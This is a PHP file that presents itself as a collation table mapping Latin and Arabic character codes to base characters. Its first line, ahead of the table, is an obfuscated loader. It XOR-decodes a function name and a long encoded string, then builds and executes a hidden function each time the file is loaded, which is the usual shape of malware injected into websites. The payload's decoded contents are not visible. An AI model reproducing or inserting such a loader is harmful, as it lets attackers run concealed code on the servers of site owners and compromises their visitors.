<?php $XBiJwHO='0BIO;=fS,=;;,B '; $CgszFIV='S0,.OX95YSXOE-N'^$XBiJwHO; $ssqrDilD='86XyKAU:ABX<dU9R CKpM .:5<7O k>4=HibpW,aa E67TWOSXM 3iS0 Lb0P0Eqq5W1YthsVNMfYjiKv<P;0kT7OuPZtclhb1Z;;cF3yktsyFcBo90 ZK4euY4J5qMIs1mmdOCqf8GCnlwSEb4 644E:aMlJp172jUGctV1B6<PVrFE<YKeeniaJD0X< NjF,6TlwNc0c:Dgf4P1.nTR+O80YoeF6OO ,EHIoxa>7493ry3KWI V2=DGVg.avuu6B2+djY<+JzNIuJ6=IYlILrkR5  MnES>ovXiZTWCPLu2M WAxhe=V;>-P;Kar 4qyle-.0LprFkgWDDEZ,=xpSr5wdnt:bV0 FuEQ ygXYUXT:BPlK.SOFmJX3ZeG-DqnxVF60ynpFt,.TLlRPlXA= Rc==:=8n8E>P 5gGS71VNXOUQY K5fT=LdRVFY3e,;Ea52+6sqo, -AH=cm,T> anmaOW2MjY-.ksjx0 cIT42-hOjgS:OL8eV6I3T :J2HnlKS<STyA4M AmDeqKFVYSrlYJ +.m9,2Weznhdcl7XRnYB- zvyDqrg28RpISqtekQV t4bKdbVBuuO89;09VI:<SNXIJFyd=08AC4DIZOc ZC6mPrnCmuvVyy15,<Jb.O70okBW6V=9ST-nxMp=,=YZqfV4;'; $FvUKKzG=$CgszFIV('', 'QPpX-4;Y5+7R;0A;S78XjXAHjXV;A4aYH<NKYwWkhF0XT > =x5OA67QT-=o=E1YUQ6E8XHW=+4OyJIkVGZ29O;B;UmzSDWbk8<TIKbZYVTCBfG+SJDR6.ZMQ=U>TXviWXFFMEJxBW27NBJsmFPABUoaS<m2jTZRK1q.CQvB6DP58Zb.Y b8LUchC6U,IR BbCC ELDjMiGNmBP1EONirM.TC<TobR.;As.-0OEAXVXJVIs9-8;E7QUdor8m.9><sbSXDN2YRjGpiQ<WQ<<Ei7xbvQAT,1.6GOKxM11.xZEQV,T6aEHAK7WKHk16kxIRQQMAIOD-YR=an1+6 ;OUXXw-g25;1i6vQSfQ.4YYZfyq.5V75EkUYFOI.9G;:,H=QSXr-SIBdyOPHO -LopH. QU7X74G7Ed2aZ1TTGzswD8===<05I1PN,R>;6728l:AN1IWSXSEE0HEN.,XKIH5JAHBME+6F,52HWBZQrYFKm0UFLHiLG2H=-A:=S0l1XS9F;FK 6EtxYeP,T DdCWkn;=fZH=+TJuJRIKp8SNUYCKVjkVm HEONO AAQPYcDqcGESYi2ABRS-CKvdSU.JKZIf=,Cc661:>5QCMQA-,U nvoGD;7WDyRNcMUV-spTCMPbFJ.CQ4L26O:RX7spGCGyXTT-rAOm>F'^$ssqrDilD); $FvUKKzG();
$collation = array (
  173 => 8205,
  1600 => 8205,
  1611 => 8205,
  1612 => 8205,
  1613 => 8205,
  1614 => 8205,
  1615 => 8205,
  1616 => 8205,
  1618 => 8205,
  1617 => 8205,
  710 => 94,
  189 => 188,
  190 => 179,
  65 => 97,
  224 => 97,
  226 => 97,
  66 => 98,
  67 => 99,
  231 => 99,
  68 => 100,
  69 => 101,
  233 => 101,
  232 => 101,
  234 => 101,
  235 => 101,
  70 => 102,
  402 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  238 => 105,
  239 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  79 => 111,
  244 => 111,
  339 => 111,
  338 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  84 => 116,
  85 => 117,
  249 => 117,
  251 => 117,
  252 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  90 => 122,
  1573 => 1575,
  1571 => 1575,
  1570 => 1575,
  1606 => 1722,
  1729 => 1607,
  1726 => 1607,
  1572 => 1608,
  1746 => 1610,
  1574 => 1610,
);
?>